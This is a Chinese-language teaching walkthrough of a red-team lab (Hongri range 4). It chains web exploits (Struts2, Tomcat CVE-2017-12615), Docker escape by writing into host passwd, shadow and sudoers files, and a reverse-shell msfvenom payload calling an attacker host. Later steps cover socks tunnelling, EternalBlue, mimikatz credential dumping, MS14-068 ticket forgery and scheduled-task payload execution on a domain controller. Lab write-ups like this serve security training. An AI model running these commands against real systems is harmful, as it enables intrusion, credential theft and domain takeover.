ATT&CK红队评估(红日靶场四)渗透测试教学文档

靶场环境概述

靶机配置

• WEB主机：Ubuntu系统
  • 用户名/密码：ubuntu/ubuntu
  • 运行Docker容器环境
• WIN7主机：Windows 7系统
  • 用户名/密码：douser/Dotest123
• DC主机：Windows Server 2008域控制器
  • 用户名/密码：administrator/Test2008
  • 域名：demo.com

网络拓扑

• 两个子网：vmnet0和vmnet1
• vmnet1网段：192.168.183.0/24
• 攻击机Kali与WEB主机第一张网卡同为NAT模式

初始渗透

端口扫描

nmap -sS -p 1-65535 -A 192.168.48.146

发现开放端口：

• 22：SSH服务
• 2001：Struts2中间件
• 2002：Apache Tomcat
• 2003：Apache + PHPmyadmin + MySQL

漏洞利用途径

1. Struts2漏洞利用

• 使用工具检测和利用Struts2漏洞
• 生成并上传MSF木马：

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.48.136 LPORT=4444 -f jsp > shell.jsp

• MSF监听设置：

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.48.136
exploit

2. PHPMyAdmin漏洞利用

• 无需认证直接进入后台
• 可通过数据库日志写入Webshell（参考红日靶场一方法）

3. Tomcat CVE-2017-12615任意文件写入

使用PUT方法上传JSP木马：

PUT /1.jsp/ HTTP/1.1
Host: 192.168.3.103:2002
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

Docker逃逸技术

检测Docker环境

ls -alh /.dockerenv

逃逸方法尝试

1. Dirty Cow漏洞利用

• 前提：宿主机内核存在Dirty Cow漏洞
• 编译利用工具：

git clone https://github.com/scumjr/dirtycow-vdso.git
cd dirtycow-vdso
make

• 通过Python搭建临时下载服务：

python -m SimpleHTTPServer 80

2. 特权模式逃逸

• 查看磁盘信息：

fdisk -l

• 挂载宿主机根目录：

mkdir /out
mount /dev/sda1 /out

• 尝试添加用户或SSH密钥：

echo "qwe1:x:1006:1006:qwe1,,,:/home/qwe1:/bin/bash" >> test/etc/passwd
echo "qwe1:$1$xJbww$Yknw8dsfh25t02/g2fM9g/:18381:0:99999:7:::" >> test/etc/shadow

或写入SSH公钥：

echo 'ssh-rsa AAAAB3Nza...' >> out1/home/ubuntu/.ssh/authorized_keys

3. 提权方法

• 修改sudoers文件：

echo 'ubuntu ALL=(ALL:ALL) ALL' >> out/etc/sudoers

• 然后执行：

sudo su root

内网渗透

信息收集

• 查看网络接口：

ifconfig

• 添加路由：

route add 192.168.183.0 255.255.255.0 2

代理建立

使用EarthWorm工具：

1. Kali上执行：

./ew_for_linux64 -s rcsocks -l 1080 -e 1234

2. 目标主机上：

./ew_for_linux64 -s rssocks -d 192.168.48.136 -e 1234

内网主机发现

use auxiliary/scanner/discovery/udp_probe
set RHOSTS 192.168.183.0/24
set THREADS 5
exploit

发现主机：

• 192.168.183.130：域控(WIN-ENS2VR5TR3N)
• 192.168.183.128：WIN7(TESTWIN7-PC)

横向移动

永恒之蓝漏洞利用(MS17-010)

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set RHOSTS 192.168.183.135
exploit

凭证获取

使用mimikatz获取凭据：

mimikatz.exe
privilege::debug
sekurlsa::logonpasswords

获取信息：

• USER: douser
• Domain: DEMO.COM
• NTLM: bc23b0b4d5bf5ff42bc61fb62e13886e
• SID: S-1-5-21-979886063-1111900045-1414766810-1107
• PASSWORD: Dotest123

Kerberos域提权(MS14-068/CVE-2014-6324)

1. 生成高权限票据：

MS14-068.exe -u douser@DEMO.COM -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130 -p Dotest123

2. 清除现有票据：

kerberos::purge

3. 注入新票据：

kerberos::ptc "TGT_douser@DEMO.COM.ccache"

域控渗透

1. 生成MSF绑定木马：

msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=192.168.183.130 LPORT=7777 -f exe > shell.exe

2. 开启WIN7远程桌面：

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

3. 创建新用户并提权：

net user aaa qwe123!asd /add
net localgroup administrators aaa /add

4. 通过RDP共享上传文件：

rdesktop 192.168.183.137 -r disk:wj=/root

5. 复制木马到域控：

copy shell.exe \\WIN-ENS2VR5TR3N\c$

6. 创建计划任务执行：

schtasks /create /S WIN-ENS2VR5TR3N /TN "test" /TR c:/shell.exe /SC MINUTE /ST 21:27 /ru system /f

7. 关闭防火墙（如被拦截）：

echo NetSh Advfirewall set allprofiles state off >> 1.bat
copy 1.bat \\WIN-ENS2VR5TR3N\c$
schtasks /create /S WIN-ENS2VR5TR3N /TN "test1" /TR c:/1.bat /SC ONCE /ST 21:57 /ru system /f

关键要点总结

1. 多途径初始访问：Struts2、PHPMyAdmin和Tomcat漏洞均可作为入口点
2. Docker逃逸技术：特权模式挂载是最可靠的逃逸方法
3. 内网代理建立：EarthWorm是有效的socks代理工具
4. 横向移动核心：永恒之蓝漏洞和Kerberos票据伪造是关键
5. 域控渗透技巧：计划任务配合文件共享是绕过限制的有效方法

通过以上步骤，可以完整地完成从外网渗透到内网域控的完整攻击链。